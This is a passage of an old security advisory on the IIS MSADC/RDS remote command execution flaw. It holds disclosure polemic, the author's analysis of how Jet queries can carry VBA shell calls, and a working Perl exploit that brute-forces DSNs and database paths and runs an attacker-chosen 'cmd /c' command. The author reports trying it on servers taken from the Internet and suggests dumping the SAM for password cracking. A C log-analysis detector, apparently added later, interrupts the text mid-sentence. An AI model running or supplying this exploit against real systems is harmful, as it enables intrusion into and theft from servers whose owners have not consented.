What's the difference? Only the integrity of the people involved. Again, a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg Gonzalez isn't really a hacker that goes by 'Digital Killer'.
I push for the point that no matter who it is in any case, it's wrong. Elias Levy would have told everyone the bug. :)

NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would you pay?" Administrivia from Feb 99, in which he says:

"Someone else makes the Security Portal and you get what they think you need"

As opposed to getting what Russ thinks we need instead? It all depends on whether or not the other guy denies posts about sample scripts....(if you *still* don't get it, re-read section one AGAIN).

Ok, ok, so that RDS background turned more into a political thing. Well, that's because it is. At this point, Russ and Greg have the keys to IIS servers. I don't know about you, but I'm not liking it. So I'm getting off my ass and doing something. Besides the fact that this is all published stuff at this point.

Also, I may be considered 'irresponsible' for posting the exploit. Now, I would say *maybe* it would be debatable if I had posted *only* the exploit. But I have posted not only a very long diatribe, but also my guess of the vulnerability, which includes examples of analysis and theory. My hopes are to educate people on what the problem is, and how I went about finding it so that they can perhaps learn how to do it themselves. Education. It's the key, and that's what I'm trying to do. No, no vendor education...ADMIN education. USER education. I know it will probably be futile as a whole in the end, but maybe a few people will learn something, and that's all that matters to me.

- 3 - *MY* Guess at Greg's RDS Vulnerability

(I say 'guess' because I may not be right. But in any event, I wouldn't be writing all this unless I found something moderately interesting ;)

Ok, so Greg's RDS vulnerability has three main aspects:

1. You only need the RDSServer.DataFactory component
2. It uses Jet queries with my embedded VBA via pipes trick
3.
You don't need userIDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database

Now, for those of you who don't know, RDS is basically a way to do remote data queries to a server. This is done over the web. Basically your client app communicates via HTTP to the /msadc/msadcs.dll on your server. The msadcs.dll exposes the RDSServer.DataFactory object, better known as the AdvancedDataFactory. Now AdvancedDataFactory only has four methods, so we're kind of limited on what we can do. We can CreateRecordSet, Query, SubmitChanges, and ConvertToString. Query and SubmitChanges require a valid database to work upon. The other two are just data mangling functions. So there you have it, that's what we have to work with.

I played with CreateRecordSet and ConvertToString. This actually relays data from the client, to the server, and back. My hopes were that somewhere in there I could slip one of my pipe-VBA-shells in there and do fun stuff. But nope, all they did was regurgitate the data in a different flavor. Oh well. SubmitChanges just basically does an elaborate UPDATE/INSERT, where it just syncs the server's database with the client's recordset.

So that leaves Query. Well, Query lets us run queries against an (existing) database. And we know we can embed our pipe-VBA-shells in queries, so Query looks good. But this is nothing spectacular. And there is one catch: the need for an existing database. We need to pass a DSN to the ActiveDataFactory to actually run the query on. The problem with the DSN is that:

1. DSNs can require UIDs and passwords
2. There's no way to get a list of available DSNs (** through RDSServer.DataFactory functions, that I'm aware of **)
3. I'd say a DSN constitutes an 'active' database

So DSNs blow away point 3 of our known things about Greg's RDS vulnerability. What if we can get around using DSNs? Well, we can.
See, you can go the easy route by specifying "DSN=rfp", and then the server keeps all the internal information about that DSN, including driver, actual database file location (if it's a file-based driver), UID, password, connection parameters, etc. Well, what's fun is that we can directly give all that stuff in the query setup instead of a DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F. Prigogine). We will use these parameters:

  DSN name 'rfp'
  Microsoft Access (Jet) driver
  c:\rfp.mdb for our database
  UID will be 'rfp'
  password will be 'prigogine'

So by invoking "DSN=rfp", the server knows to use the Access driver on the c:\rfp.mdb file. DSNs are a nice tight way to precompose all that information. Or we can do it on the fly. Rather than issuing a "DSN=rfp" connect string, I can use instead:

  "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;"

This will still invoke the Access (Jet) driver, and tell it to directly use c:\rfp.mdb. No UID. No password. Not even worrying about if/what DSNs exist. In the words of Cartman, "Sweet". That whacks out part of known point #3 (no UID or password). We're going to use the RDSServer.DataFactory control (known point #1), and we're going to use the Access driver, with fun pipe-VBA-shell features (known point #2). We're not using any other web sample scripts, so that cuts out another portion of known point #3. Oh, we're so close...can you taste it? (and what does it taste like? chicken?)

There's still one minor detail. Notice we have to specify the 'dbq=' parameter in the connection setup. And this needs to be a valid file. If it's not, the SQL engine on the server side will fail and return errors before it even gets around to looking at our queries. But damn, we need an .mdb file to connect to. Well, if you look in the Access ODBC reference on Microsoft's website (which sucks, half the links were broken at various moments through the night while sifting through it...go MS.
I don't blame you though--you probably engineered your site/servers with Microsoft products, and that explains it right there) you will see that you can pass a CREATE_DB parameter to the Access driver. This will cause the driver to construct a valid (empty) .mdb file. Woohoo! (not to be confused with w00w00; the former is an expression of joy, the latter is a cool group of guys that I had the fortune of hanging out with at DefCon) So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with everything else and lo and behold, it......

----- Some words about my sponsors ---------------------------------------

-- www.technotronic.com

Technotronic! Great place! Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9 (before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!), boasting a slick HTML design recently redone by yours truly (Rain Forest Puppy/R. F. Prigogine), it's definitely a good site for the latest security information--especially while PacketStorm is struggling to get back on its feet (thanks, JP. Now die. What, you're suing me now?!?)

While you're there, be sure to check out:

* Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a windows box and see if it's a PDC, BDC, Member server, SQL server, etc. Also look for the Unix port of it by me sometime soon (after I finish all this RDS stuff)

* Horizon's Page! -- that's right. Elite HTML coded by Humble himself. Problem was he didn't know where to put the shell code...? J/K :) The URL is /horizon/

* Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to Germany, there was one last code fest, and some fun binaries came out of it. Look for them soon!

Technotronic also has the R9 mirror at rhino9.technotronic.com

-- www.l0pht.com

L - zero - p - h - t

Everybody knows L0pht (even senators!) A very active 'independent security (watchdog) group' who include Dr. Mudge & Dildog (BO2K creator).
While you're there, be sure to check out:

* L0phtcrack! -- one of the best NT password crackers out there! This will prove highly useful if you use this exploit to dump the SAM and grab the backup (not that I encourage hacking...I've done this many times in LEGIT contracted audits). It's a personal tool I've standardized on.

* Advisories! -- L0pht releases a very nice variety of advisories, from Windows DLL problems and Cold Fusion script problems to Unix race conditions and symlink vulnerabilities.

* NFR Modules! -- they've teamed up with NFR to be the supplier of many interesting N-code/NFR modules. They have a nice selection for your popular network attacks.

** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty awesome as well!

-- www.houseoffusion.com

A great independent Cold Fusion site! The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man for all things Cold Fusion and has helped me out immensely with various Cold Fusion language issues (read: helped me work through some of the various Cold Fusion exploits that have surfaced). He does offer training for Cold Fusion...see 'Training Info' under ''. He co-authored "Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web Application Construction Kit" vols 2 and 3, and was the founding member of Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF Advisor, at www.cfadvisor.com.

While you're there, be sure to check out:

* MunchkinLAN! -- a CF based web scanner, which is actually very minimal code and runs out of an Access db.

* Mike's Mods! -- many modifications to the Cold Fusion Forums scripts, which include speed/operation improvements.

* CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is a high traffic list discussing Cold Fusion related development issues, security, etc.

-- Thanks again to all of the above!
-------------------------------------------------------------------------

...didn't work. Damn.
The problem was that it was passing the CREATE_DB parameter during the SQLDriverConnect() phase, and that just isn't going to cut it. We need to issue a SQLConfigDataSource() call (I think that was it...my mind is a mush of ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do its thing, and RDSServer.DataFactory.Query just wasn't going to give us love. So, after struggling with other nuances and ideas, I concluded that I couldn't make a DSN, or a .mdb from scratch using Access SQL via RDSServer.DataFactory without connecting to a database/.mdb beforehand. (**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU 0DAY! :) rfp@wiretrip.net )

Well damn, so we need a database to make this work. Any ol' database will do (hell, even the WINS or DHCP .mdb should work >:). But unfortunately, none come by default on a standard NT install. Bummer.

But wait....all is not lost.... It seems when you do a 'typical' or better install with Option Pack 4, a particular .mdb is installed...namely the btcustmr.mdb which is installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the day! They're just so damn efficient at helping us hack their own product... To get IIS 4.0 you practically need to install Option Pack 4, which will also then install MDAC 1.5--this is good. Let's just hope they didn't pick the 'minimal' install...

The last catch is that we need to figure out what %systemroot% is. On the majority of the systems it will probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine is f:). I guess some wacko might do \win, \windows, \nt, and if you upgrade it may be \winnt351 or \winnt35. Well, we can do a little 'brute force' on all those combinations until one works. Oh, and no, you can't do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver pukes.

So that's my guess! Mr.
Gonzalez is using a connection string similar to

  "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"

with a query that contains one of the pipe-VBA-shell commands. Now, I think this technically meets all the known points of the exploit--the only fuzzy one is where Greg mentions "no need of an *active* database". Now, I may be reading into it, but btcustmr.mdb is hardly active. It's a totally unused .mdb sitting in a directory most people probably didn't know existed.

Just to double check, I did a quick little test...and six of the ten servers I picked off the Internet were susceptible to this method. That's a tad better than Greg's 50%, but I had a small population sample, so I'll give him the benefit of the doubt.

Now, I obviously could be wrong. Maybe Greg found a way to create the .mdb, or some other way where he doesn't need to rely on the existence of btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate database applications. Period. They're gross. But I put up with it for the better good of the Internet. :) But yes, I could be wrong, and I'm willing to admit it.

Let me also mention the contenders. They were contenders, but definitely did not make the final round because as much as they 'looked' and 'smelled' exploitable, I couldn't get them to crack:

1. Data Shape Provider. This already has hooks into the VBA interpreter (you can put VBA commands in the CALC() function--except it lacks shell()), and is a primary suspect in my eyes. The bonus is that you do *not* need any database files to use this. Well, barring the fact that I really don't know what I'm doing, I played around with it trying to feed some pipe-VBA-shells to it and whatnot, but couldn't get anything interesting to happen. Now, this is installed by default, has VBA hooks already, doesn't need a database, etc. I say this fits the description more than the btcustmr.mdb thing. And it's just altogether 'cooler'.

2. Index Server Provider.
Now, not all places use Index Server, so I highly doubted this was the route, but it is a contender. Again, you don't need a database file, so that's a bonus. I tried the usual pipe-VBA-shell commands, but no go either.

If I really had to choose, I'd say the exploit was in the Data Shape Provider (which Microsoft also warned of in the advisory). But since I couldn't get it to give me love, I went with btcustmr.mdb.

- 4 - Bonus Aspects of My Version of the Exploit

So, yes, I could be wrong. But I figure why not just feature pack this exploit to *really* kick some ass? Well, so, I wasted a few brain cells (the things I do for you people...jeez) and thought of some good things to toss into the code. I figure hey, might as well make this a useful tool!

The first one is pretty obvious. There are many applications on the market, that would be used on a server, that would make/require a DSN. For instance Cold Fusion creates a few DSNs, as does iHTML. Some of the sample apps that come with IIS create DSNs as well, and the MDAC makes a few too. All these potential DSNs. Remember, it only takes one DSN to work. So if we wanted to, we could scan to see if any of a number of default DSNs exist, and if they do, exploit them.

An extension of this would be user created DSNs. Again, all we need is the DSN name, so we can scan for what are 'psychologically' common DSN names. For instance test, web, data, database, www, db, and sql are common type DSN names. Basically, if you supply a dictionary file of DSN names you want to use, the exploit will sit there and brute force, a la a remote password cracker, on the DSN names. Of course, we'd need DSNs with the Access Driver. But what's nice is that if we connect to a valid DSN with an invalid SQL query, we'll get back the name of the driver in the error message. So it's a nice way to check.

Then we can also do an inverse type thing--instead of looking for common DSNs to connect to, we can look for common .mdbs to connect to.
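Every one of these connection attempts (the raw driver connect, the DSN guessing, the .mdb guessing, and the makedsn.exe trick that follows) is, on the wire, an HTTP request to /msadc/msadcs.dll or to /scripts/tools/makedsn.exe, which is what makes a probe easy to pick out of the web server's log. The following is an added example (my own code, not part of RFP's advisory or of msadc.pl) that runs that check over a constructed sample of IIS W3C extended log lines. The field layout, the sample addresses and the threshold are assumptions: IIS lets you choose which fields are logged, and legitimate RDS clients also talk to msadcs.dll, so a single hit on that DLL proves nothing by itself, whereas any request for makedsn.exe, a sample tool, is worth a look on its own.

```c
/*
 * Added example, not part of RFP's advisory or msadc.pl: a detection
 * pass over IIS log lines for the RDS probing pattern described in the
 * text.  Every connection attempt the script makes is an HTTP request to
 * /msadc/msadcs.dll or /scripts/tools/makedsn.exe, so a client that
 * hammers msadcs.dll, or touches makedsn.exe at all, stands out.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample log (not a real capture), W3C extended format with
 * the fields date time c-ip cs-method cs-uri-stem cs-uri-query sc-status. */
static const char *const sample_log[] = {
	"2000-03-20 01:02:03 10.0.0.5 POST /msadc/msadcs.dll - 200",
	"2000-03-20 01:02:05 10.0.0.5 POST /msadc/msadcs.dll - 500",
	"2000-03-20 01:02:06 10.0.0.5 POST /msadc/msadcs.dll - 500",
	"2000-03-20 01:02:08 10.0.0.5 POST /msadc/msadcs.dll - 500",
	"2000-03-20 01:02:09 10.0.0.5 GET /scripts/tools/makedsn.exe - 200",
	"2000-03-20 01:03:00 192.168.1.9 GET /default.htm - 200",
	"2000-03-20 01:03:30 192.168.1.9 POST /MSADC/msadcs.dll - 200",
};
#define SAMPLE_LOG_N (sizeof sample_log / sizeof sample_log[0])

enum { RDS_NONE = 0, RDS_MSADCS = 1, RDS_MAKEDSN = 2 };

/* Case-insensitive compare: NT paths are not case sensitive, so /MSADC/
 * and /msadc/ reach the same DLL. */
static int ieq(const char *a, const char *b)
{
	while (*a && *b) {
		if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
			return 0;
		a++;
		b++;
	}
	return *a == '\0' && *b == '\0';
}

struct rds_hit {
	char ip[16];   /* client address of the request */
	int  kind;     /* RDS_MSADCS or RDS_MAKEDSN */
};

/* Classify one log line; RDS_NONE if unparseable or not RDS-related. */
static int rds_classify(const char *line, struct rds_hit *hit)
{
	char date[16], tm[16], ip[16], method[16], uri[256];
	if (sscanf(line, "%15s %15s %15s %15s %255s", date, tm, ip, method, uri) != 5)
		return RDS_NONE;
	hit->kind = RDS_NONE;
	if (ieq(uri, "/msadc/msadcs.dll"))
		hit->kind = RDS_MSADCS;
	else if (ieq(uri, "/scripts/tools/makedsn.exe"))
		hit->kind = RDS_MAKEDSN;
	if (hit->kind != RDS_NONE)
		strcpy(hit->ip, ip);
	return hit->kind;
}

/* Count msadcs.dll requests from one client; *makedsn receives the number
 * of makedsn.exe requests from the same client. */
int rds_client_activity(const char *const *lines, size_t n,
			const char *client, int *makedsn)
{
	size_t i;
	int msadcs = 0;
	struct rds_hit h;
	*makedsn = 0;
	for (i = 0; i < n; i++) {
		if (rds_classify(lines[i], &h) == RDS_NONE || strcmp(h.ip, client))
			continue;
		if (h.kind == RDS_MSADCS)
			msadcs++;
		else
			(*makedsn)++;
	}
	return msadcs;
}

/* Verdict: any makedsn.exe request is a hit on its own (a sample tool
 * with no business on a production server); msadcs.dll is also used by
 * legitimate RDS clients, so it only counts once it reaches 'threshold'. */
int rds_is_probe(const char *const *lines, size_t n, const char *client, int threshold)
{
	int makedsn;
	int msadcs = rds_client_activity(lines, n, client, &makedsn);
	return makedsn > 0 || msadcs >= threshold;
}

int main(void)
{
	const char *clients[] = { "10.0.0.5", "192.168.1.9" };
	size_t i;
	for (i = 0; i < 2; i++)
		printf("%-12s %s\n", clients[i],
		       rds_is_probe(sample_log, SAMPLE_LOG_N, clients[i], 3) ? "RDS probe" : "ok");
	return 0;
}
```

The threshold is per client over the whole sample; on a real log you would window it in time, and a burst of msadcs.dll requests that mostly return 500 (failed connects while the script walks its DSN and .mdb lists) is the shape to look for.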
For instance MS Cert Server, DHCP, and WINS all use .mdbs, as well as particular sample scripts, SDKs, etc. We can just try to connect to them directly. If we find one, rather than dealing with the table information within the .mdb, we can just CREATE TABLE on it first, and then exploit the table we just created. Very simple. Another interesting feature is dumping the root scope paths from Index Server. Basically it's a query of "Select paths from scope()". This is useful because it can provide us with useful directory information...since one of the tricky problems is determining location of html files and systemroot (although they're most likely guessable, that's not always the case). So I tossed this in for kicks, although it doesn't run 'inline' with the actually exploit checks. You invoke this functionality separately. The last extra functionality, but the easiest of them all, is to see if /scripts/tools/makedsn.exe exists on the webserver. If it does, we can make a DSN and define the .mdb file to use, and then exploit it right away. In my particular exploit I make a DSN named 'wicca'. (Greetings to Simple Nomad! I wish you could have been around at DefCon. Next time.) So, wow. Lots of ways to get a database connection. My RDS exploit tries them in the following order, continuing until successful: - try raw driver connect to btcustmr.mdb - try to create a DSN with /scripts/tools/makedsn.exe - look for common DSNs - look for common .mdbs - try 'dictionary' attack on user DSNs And separately you can query Index Server to get the paths information (Warning: this could be a lot of information! The script automatically sorts out common directories). ----- Campaign solicitation -------------------------------------------- XOR!! The unofficial AES candidate! There are many reasons why you should support XOR: 1. It's mad fast! 2. It can be implemented in very little code 3. It will run with decent performance even on the meekest of Casio watches 4. 
The ciphertext doesn't look like the plaintext--this is good. 5. Stream, block, chained, unchained, XOR does it all! 6. So many companies already use it as their encryption algo of choice! So join the 'AES XOR y2k == 8w8' campaign today! ------------------------------------------------------------------------ One interesting feature that's almost necessary is a 'resume' mode. Imagine you just scanned a webserver, spending the last 5 minutes trying all the combinations of valid default .mdbs, valid DSNs, etc. Finally it cracks and you get one, and you run your command. Well, what if you want to run another command? Do you have to go through that rigmarole again? Well, not with my script. :) When you make a successful connection, it writes out a file called 'rds.save'. Then, you can just use the 'resume' switch (-R), with no other options. It will read in rds.save, and let you run a command against the successful connection again right away. Sound good so far? Ok, I'll briefly go through the command line options. - 5 - Command Line Options To run the program, just save this whole advisory to a file, such as msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out how to run the exploit at the end. No need to cut and paste. :) Ok, the command switches are as follows: -h this is the host to scan. You MUST either use either -h or -R. -d this is the delay between connections. Value is in number of seconds. I added this because hammering the RDS components caused the server to occasionally stop responding :) Defaults to 1. Use -d 0 to disable. -v verbose. This will print the ODBC error information. Really only for troubleshooting purposes. -e external dictionary file to use on step 5--the 'DSN dictionary guess' stage. The file should just be plaintext, one DSN name per line file with all the DSN names you want to try. Quite honestly a normal dictionary file won't do you much good. 
You can probably do pretty damn well with a few dozen or two good ones, like 'www', 'data', 'database', 'sql', etc. -R resume. You can still specify -v or -d with -R. This will cause the script to read in rds.save and execute the command on the last valid connection. -X perform an Index Server table dump instead. None of the other switches really apply here, other than -v (although -d still works, there's no need to slow down one query). This dumps the root paths from Index Server, which can be rather lengthy. I suggest you pipe the output into a file. Also, if there is a lot of return information, this command may take a while to complete. Be patient. And I don't suggest you use this command more than once a minute...it caused my P200 w/ 128 RAM to stop answering requests, and in general borked inetinfo.exe. If you do decide to CONTROL-C during the middle of the data download the script will save all received data into a file called 'raw.out', so you don't loose everything you've already received. NOTE: this is the raw data, which is in Unicode. - 6 - Random Q & A - "This or that function of the script is broken" -- Well, it wasn't broken when I used it, so you must of broke it. No, seriously. I've tested it on Linux, L0pht tested it on Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for Windows). They worked for us. I've coded some various checks for errors, but nothing robust. But I know it worked for me. :) - "Why don't you code this in C?" -- Because I've been programming C/C++ for 8 years. I'm tired of it. I've been coding perl for 3, so it's new and fresh, and I'm just now starting to do interesting stuff. Plus the code is portable this way. Come on, where else can you have a piece of code that does network/socket level stuff that runs on NT, Linux, and Solaris with no changes??!? - "Or you going to port this to C?" -- It wouldn't be that hard at all, but wasn't planning on it. You have something against perl? - "What's the F in Russell F. 
Prigogine stand for?" -- Fabio. Fear the geese. - "Why do you act like this is a joke?" -- Because I don't get paid for doing this, I don't get donations, and I don't get any sexual gratification from this what-so-ever. I do this because I *like* to, because it's *FUN*--so damn it, I'm having fun! - "I don't get some of the jokes in the paper. Like what's FMP?" -- If you have to ask, you wouldn't understand. This advisory is teeming with inside jokes. RFP, FMP. - 7 - Signoff Ok, I've been coding the exploit, reading MS database propaganda (did I mention yet I hate database stuff?), and writing this damn advisory for a collective of 30 hours. About time I stop and never think about it again. :) So you have my best shot at the RDS exploit, even though I think there may be something pretty nifty hiding in the Data Shape Provider (or maybe Index Server). We'll just have to wait and see if/when Greg and Russ finally decide they can share their toys. Remember, I spent 2 days typing all this in an attempt to teach people something, rather than to just release the vanilla exploit. So if you want to label me irresponsible, well, I suppose I could have been more so. Moreover, I support eEye in what they did 100%. Russ says "there are numerous unwritten rules when it comes to security disclosures". Rules? Unwritten? Well, maybe eEye was unaware of these rules, since they're not written down. Future updates to this advisory and exploit code will be posted to www.technotronic.com/rfp/ Well, it's been fun. Until the next release (which may be sooner than you think ;) - rain forest puppy / R. F. Prigogine - - ADM / Wiretrip - - rfp@wiretrip.net - *** SPECIAL THANKS once again to Mudge and Weld from www.l0pht.com for helping me out on the preliminary assessment, and Mike Dinowitz from www.houseoffusion.com and Vacuum from www.technotronic.com for creative input. Time is creation. The future is just not there. - 8 - The Code!!!! 
Again, to run this, save this advisory to a file (for instance msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt). #!perl # # MSADC/RDS 'usage' (aka exploit) script # # by rain.forest.puppy # # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me # beta test and find errors! use Socket; use Getopt::Std; getopts("e:vd:h:XR", \%args); print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -v = verbose -e = external dictionary file for step 5 Or a -R will resume a command session ~; exit;} $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; } if (!defined $args{R}){ $ret = &has_msadc; die("Looks like msadcs.dll doesn't exist\n")if $ret==0} print "Please type the NT commandline you want to run (cmd /c assumed):\n" . "cmd /c "; $in=; chomp $in; $command="cmd /c " . $in ; if (defined $args{R}) {&load; exit;} print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr; print "\nStep 2: Trying to make our own DSN..."; &make_dsn ? print "<>\n" : print "<>\n"; print "\nStep 3: Trying known DSNs..."; &known_dsn; print "\nStep 4: Trying known .mdbs..."; &known_mdb; if (defined $args{e}){ print "\nStep 5: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; } print "Sorry Charley...maybe next time?\n"; exit; ############################################################################## sub sendraw { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! 
At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $msadc=<Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { my @drives=("c","d","e","f"); my @dirs=("winnt","winnt35","winnt351","win","windows"); foreach $dir (@dirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . 
$in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1, $p2, $p3, $p4)=@_; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n"; close OUT;} ############################################################################## sub load { my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq="; open(IN,"; close(IN); $ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; $p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g; if($p[1]==1) { $reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]")); if (rdo_success(@results)){print "Success!\n";} else { print "failed\n"; verbose(odbc_error(@results));}} elsif ($p[1]==3){ if(run_query("$p[3]")){ print "Success!\n";} else { print "failed\n"; }} elsif ($p[1]==4){ if(run_query($drvst . "$p[3]")){ print "Success!\n"; } else { print "failed\n"; }} exit;} ############################################################################## sub create_table { my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . 
make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { # we want 'wicca' first, because if step 2 made the DSN, it's ready to go my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n"; if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else { print "Something's borked. Use verbose next time\n";}}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . 
make_req(3,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; # this is sparse, because I don't know of many my @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv . $drive . ":\\" . $dir . $mdb)){ print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n"; if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next time\n"; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv . $drive . $dir . $mdb)){ print "\n" . $drive . $dir . $mdb . " successful\n"; if(run_query($drv . 
